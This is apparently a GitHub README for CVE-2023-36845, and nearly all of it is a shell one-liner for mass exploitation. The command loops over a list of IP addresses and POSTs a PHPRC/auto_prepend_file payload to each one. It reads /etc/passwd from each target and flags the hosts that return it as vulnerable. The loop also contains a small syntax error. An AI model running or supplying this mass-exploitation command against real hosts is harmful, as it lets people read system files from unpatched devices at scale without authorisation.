Skip to content

Latest commit

 

History

History
5 lines (3 loc) · 227 Bytes

README.md

File metadata and controls

5 lines (3 loc) · 227 Bytes

CVE-2023-36845

Mass check One liner CVE-2023-36845

cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo $host "is VULNERABLE";done